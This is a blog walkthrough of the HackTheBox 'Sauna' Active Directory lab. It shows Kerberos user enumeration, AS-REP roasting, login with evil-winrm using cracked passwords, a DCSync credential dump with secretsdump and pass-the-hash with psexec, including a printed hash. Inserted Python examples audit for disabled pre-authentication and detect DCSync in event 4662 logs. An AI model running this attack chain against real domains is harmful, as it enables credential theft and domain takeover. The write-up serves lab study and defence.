Sauna Active Directory Walkthrough | DCSync Attack

D3athCod3
Jun 13, 2024


Hello, fellow hackers! Today, we’re diving into a new HackTheBox machine which is focused on Active Directory testing. So, let’s get started without wasting any time!

Scanning

Let’s start by scanning the machine with nmap:

nmap -p- -vvv -sV --script vuln 10.10.10.175

Result

PORT      STATE SERVICE       REASON          VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=sauna.htb
| Found the following possible CSRF vulnerabilities:
|
| Path: http://sauna.htb:80/
| Form id: email
| Form action: #
|
| Path: http://sauna.htb:80/about.html
| Form id: email
| Form action: #
|
| Path: http://sauna.htb:80/index.html
| Form id: email
| Form action: #
|
| Path: http://sauna.htb:80/single.html
| Form id:
| Form action: #
|
| Path: http://sauna.htb:80/single.html
| Form id:
| Form action: #
|
| Path: http://sauna.htb:80/contact.html
| Form id:
|_ Form action: #
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-server-header: Microsoft-IIS/10.0
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-06-12 18:31:47Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
|_ssl-ccs-injection: No reply from server (TIMEOUT)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49675/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49739/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49775/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC

We got a bunch of open ports.

Accessing and Enumerating HTTP

I started by enumerating port 80, which is running IIS version 10.0.

I tried reading the source code, directory enumeration, etc., but found nothing interesting. Only inside about.html did we find the team names, which we are going to use as usernames later.

Let’s move on to another port, i.e. Samba. I tried enumerating shares using smbmap, but it did not work.

Next I moved on to another port, i.e. LDAP, and tried enumerating it using ldapsearch, but it did not provide anything useful.

Let’s move on to another port, i.e. kerberos-sec.

Kerberos Pentesting

* User enumeration using kerbrute

1. Here I am using the team names we found on the about.html page. To turn them into username candidates I am using the https://github.com/captain-noob/username-wordlist-generator script.

2. Finally I get output.txt, which contains all variations of the usernames. Then, using the kerbrute script:

./kerbrute userenum -v --dc 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL output.txt -o valid_user.txt

Result:

3. I then checked whether the FSmith user had pre-authentication disabled. If it is disabled, we get a TGS ticket hash that we can use to log into the FSmith user account.

impacket-GetNPUsers -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/FSmith -no-pass

Result:

4. Finally, using John the Ripper, I cracked this ticket hash.
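The pre-authentication check in step 3 works because the account’s userAccountControl has the “Do not require Kerberos preauthentication” flag set, so the fix is to find and clear that flag. As an added example that is not part of the original post, this Python script audits a constructed sAMAccountName / userAccountControl export (as you would get from ldapsearch or Get-ADUser) for the flag; the account names and flag values are made up for illustration.

```python
# Added example, not from the original walkthrough: audit a constructed
# sAMAccountName / userAccountControl export for accounts that do not
# require Kerberos pre-authentication. No directory is contacted.
from typing import Dict, List

# userAccountControl bit flags, as documented by Microsoft.
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Constructed sample export; names and values are illustrative only.
SAMPLE_EXPORT = """\
sAMAccountName: Administrator
userAccountControl: 66048
sAMAccountName: FSmith
userAccountControl: 4260352
sAMAccountName: svc_loanmgr
userAccountControl: 66048
sAMAccountName: old_svc
userAccountControl: 4260354
"""


def parse_export(text: str) -> Dict[str, int]:
    """Pair each sAMAccountName with the userAccountControl line after it."""
    accounts: Dict[str, int] = {}
    current = None
    for line in text.splitlines():
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "sAMAccountName":
            current = value
        elif key == "userAccountControl" and current is not None:
            accounts[current] = int(value)
            current = None
    return accounts


def preauth_disabled(accounts: Dict[str, int], include_disabled: bool = False) -> List[str]:
    """Accounts with DONT_REQUIRE_PREAUTH set; disabled ones are skipped
    unless include_disabled is given, since they cannot be roasted but
    still deserve cleanup."""
    hits = []
    for name, uac in accounts.items():
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        if uac & UF_ACCOUNTDISABLE and not include_disabled:
            continue
        hits.append(name)
    return sorted(hits)
```

Run it against a real export and each name it returns is an account that should either get pre-authentication re-enabled or be given a long random password.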

Gaining Access

Using evil-winrm and the credentials we found, I was able to get an FSmith user shell and found user.txt.

evil-winrm -i 10.10.10.175 -u FSmith -p Thestrokes23

Result:

Next, using evil-winrm’s upload feature, I uploaded the Winpeasx64.exe binary into the Windows box.

Let’s run this binary.

In the output we got the autologon credentials of a service user.

I decided to use these credentials to perform a DCSync attack. For this I used the impacket secretsdump script:

impacket-secretsdump 'egotisticalbank.local/svc_loanmgr:Moneymakestheworldgoround!@10.10.10.175'

Output:
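DCSync only succeeds because the account holds the directory replication rights on the domain object, and when object-access auditing is enabled on it every such request is logged on the domain controller as Security event 4662 carrying the replication control-access-right GUIDs. As an added example that is not part of the original post, this Python script runs that detection over a constructed JSON-lines export of 4662 events (field names follow the Windows log; all values are invented); ordinary DC-to-DC replication is excluded via the machine-account suffix.

```python
# Added example, not from the original walkthrough: flag DCSync-style
# replication requests in Security event 4662 records. Input is a
# constructed JSON-lines export; field names follow the Windows log,
# all values are invented.
import json
from typing import Collection, Dict, List

# Control access rights used for directory replication (GUIDs as
# documented by Microsoft). Any of them in a 4662 "Properties" field
# means the subject asked to replicate directory data.
REPLICATION_GUIDS = (
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
)

SAMPLE_EVENTS = """\
{"EventID": 4662, "SubjectUserName": "DC01$", "ObjectType": "domainDNS", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID": 4662, "SubjectUserName": "svc_loanmgr", "ObjectType": "domainDNS", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID": 4662, "SubjectUserName": "FSmith", "ObjectType": "user", "Properties": "{00000000-0000-0000-0000-000000000000}"}
{"EventID": 4624, "SubjectUserName": "svc_loanmgr", "LogonType": 3}
"""


def is_dcsync_candidate(event: Dict, allowed: Collection[str] = ()) -> bool:
    """True when a non-DC, non-allow-listed subject requested replication rights."""
    if event.get("EventID") != 4662:
        return False
    props = event.get("Properties", "").lower()
    if not any(guid in props for guid in REPLICATION_GUIDS):
        return False
    subject = event.get("SubjectUserName", "")
    # Domain controllers replicate with each other legitimately and their
    # machine accounts end in '$'; a stricter rule would compare against the
    # actual DC list. Known sync accounts go on the allow-list explicitly.
    return not subject.endswith("$") and subject not in allowed


def find_dcsync(jsonl: str, allowed: Collection[str] = ()) -> List[str]:
    """Return the subject names of suspicious replication requests."""
    allow = set(allowed)
    hits = []
    for line in jsonl.splitlines():
        if line.strip():
            event = json.loads(line)
            if is_dcsync_candidate(event, allow):
                hits.append(event["SubjectUserName"])
    return hits
```

The same rights check explains the mitigation: review who holds Replicating Directory Changes / Replicating Directory Changes All on the domain object and remove anything that is not a domain controller or a known sync account.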

We found the administrator hash. I tried logging into the administrator account using the impacket psexec script:

impacket-psexec administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e

Output:

We successfully logged in and got root.txt.
